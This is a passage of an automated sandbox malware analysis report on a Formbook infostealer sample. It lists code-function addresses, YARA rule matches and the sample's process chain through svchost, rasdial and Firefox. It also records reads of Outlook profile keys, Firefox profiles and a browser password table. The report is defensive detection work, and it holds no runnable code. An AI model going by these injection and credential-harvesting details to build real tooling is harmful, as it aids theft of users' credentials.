            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE24466_2_04FE2446
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FD44206_2_04FD4420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FF05916_2_04FF0591
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F305356_2_04F30535
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F4C6E06_2_04F4C6E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F2C7C06_2_04F2C7C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F307706_2_04F30770
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F547506_2_04F54750
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FC20006_2_04FC2000
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE81CC6_2_04FE81CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FF01AA6_2_04FF01AA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE41A26_2_04FE41A2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FB81586_2_04FB8158
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FCA1186_2_04FCA118
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F201006_2_04F20100
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FB02C06_2_04FB02C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FD02746_2_04FD0274
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F3E3F06_2_04F3E3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FF03E66_2_04FF03E6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEA3526_2_04FEA352
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F20CF26_2_04F20CF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FD0CB56_2_04FD0CB5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F30C006_2_04F30C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F2ADE06_2_04F2ADE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F48DBF6_2_04F48DBF
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FCCD1F6_2_04FCCD1F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F3AD006_2_04F3AD00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEEEDB6_2_04FEEEDB
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F42E906_2_04F42E90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FECE936_2_04FECE93
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F30E596_2_04F30E59
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEEE266_2_04FEEE26
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F22FC86_2_04F22FC8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FAEFA06_2_04FAEFA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FA4F406_2_04FA4F40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F50F306_2_04F50F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FD2F306_2_04FD2F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F72F286_2_04F72F28
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F5E8F06_2_04F5E8F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F168B86_2_04F168B8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F3A8406_2_04F3A840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F328406_2_04F32840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F329A06_2_04F329A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FFA9A66_2_04FFA9A6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F469626_2_04F46962
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F2EA806_2_04F2EA80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE6BD76_2_04FE6BD7
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEAB406_2_04FEAB40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F214606_2_04F21460
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEF43F6_2_04FEF43F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FF95C36_2_04FF95C3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FCD5B06_2_04FCD5B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE75716_2_04FE7571
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE16CC6_2_04FE16CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F756306_2_04F75630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEF7B06_2_04FEF7B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE70E96_2_04FE70E9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEF0E06_2_04FEF0E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FDF0CC6_2_04FDF0CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F370C06_2_04F370C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F3B1B06_2_04F3B1B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F1F1726_2_04F1F172
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FFB16B6_2_04FFB16B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F6516C6_2_04F6516C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F4D2F06_2_04F4D2F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FD12ED6_2_04FD12ED
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F4B2C06_2_04F4B2C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F352A06_2_04F352A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F7739A6_2_04F7739A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F1D34C6_2_04F1D34C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE132D6_2_04FE132D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEFCF26_2_04FEFCF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FA9C326_2_04FA9C32
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F4FDC06_2_04F4FDC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE7D736_2_04FE7D73
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE1D5A6_2_04FE1D5A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F33D406_2_04F33D40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F39EB06_2_04F39EB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04EF3FD56_2_04EF3FD5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04EF3FD26_2_04EF3FD2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEFFB16_2_04FEFFB1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F31F926_2_04F31F92
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEFF096_2_04FEFF09
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F338E06_2_04F338E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F9D8006_2_04F9D800
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F399506_2_04F39950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F4B9506_2_04F4B950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FC59106_2_04FC5910
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FDDAC66_2_04FDDAC6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FCDAAC6_2_04FCDAAC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F75AA06_2_04F75AA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FD1AA36_2_04FD1AA3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FA3A6C6_2_04FA3A6C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEFA496_2_04FEFA49
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FE7A466_2_04FE7A46
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FA5BF06_2_04FA5BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F6DBF96_2_04F6DBF9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F4FB806_2_04F4FB80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FEFB766_2_04FEFB76
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F11BF06_2_02F11BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F0CB706_2_02F0CB70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F0CB686_2_02F0CB68
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F0AE106_2_02F0AE10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F0CD906_2_02F0CD90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F152506_2_02F15250
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F2B6306_2_02F2B630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F134306_2_02F13430
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CDD7786_2_04CDD778
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CDE70C6_2_04CDE70C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CDE2586_2_04CDE258
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CDE3736_2_04CDE373
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 103 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04FAF290 appears 103 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04F65130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04F1B970 appears 262 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04F9EA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04F77E54 appears 107 times
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: String function: 006A8B40 appears 42 times
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: String function: 006A0D27 appears 70 times
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: String function: 00687F41 appears 35 times
            Source: 220204-TF1--00.exe, 00000000.00000003.1673037949.00000000039FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 220204-TF1--00.exe
            Source: 220204-TF1--00.exe, 00000000.00000003.1673398150.0000000003853000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 220204-TF1--00.exe
            Source: 220204-TF1--00.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/14
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EA2D5 GetLastError,FormatMessageW,0_2_006EA2D5
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006D8713 AdjustTokenPrivileges,CloseHandle,0_2_006D8713
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006D8CC3
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006EB59E
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_006FF121
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006DDA5D CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,0_2_006DDA5D
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00684FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00684FE9
            Source: C:\Users\user\Desktop\220204-TF1--00.exeFile created: C:\Users\user\AppData\Local\Temp\autD149.tmpJump to behavior
            Source: 220204-TF1--00.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rasdial.exe, 00000006.00000002.4129935953.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2207130112.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2207220953.00000000031C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 220204-TF1--00.exeReversingLabs: Detection: 28%
            Source: 220204-TF1--00.exeVirustotal: Detection: 30%
            Source: unknownProcess created: C:\Users\user\Desktop\220204-TF1--00.exe "C:\Users\user\Desktop\220204-TF1--00.exe"
            Source: C:\Users\user\Desktop\220204-TF1--00.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\220204-TF1--00.exe"
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\220204-TF1--00.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\220204-TF1--00.exe"Jump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 220204-TF1--00.exeStatic file information: File size 1191424 > 1048576
            Source: 220204-TF1--00.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 220204-TF1--00.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 220204-TF1--00.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 220204-TF1--00.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 220204-TF1--00.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 220204-TF1--00.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 220204-TF1--00.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXIYDUFnJY.exe, 00000005.00000002.4130102860.0000000000D3E000.00000002.00000001.01000000.00000005.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098859139.0000000000D3E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 220204-TF1--00.exe, 00000000.00000003.1672930052.0000000003730000.00000004.00001000.00020000.00000000.sdmp, 220204-TF1--00.exe, 00000000.00000003.1673498138.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1933247119.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1935399769.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2032919172.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.000000000508E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2035166513.0000000004D4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000002.2032674414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2001240762.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4129769188.0000000000838000.00000004.00000020.00020000.00000000.sdmp
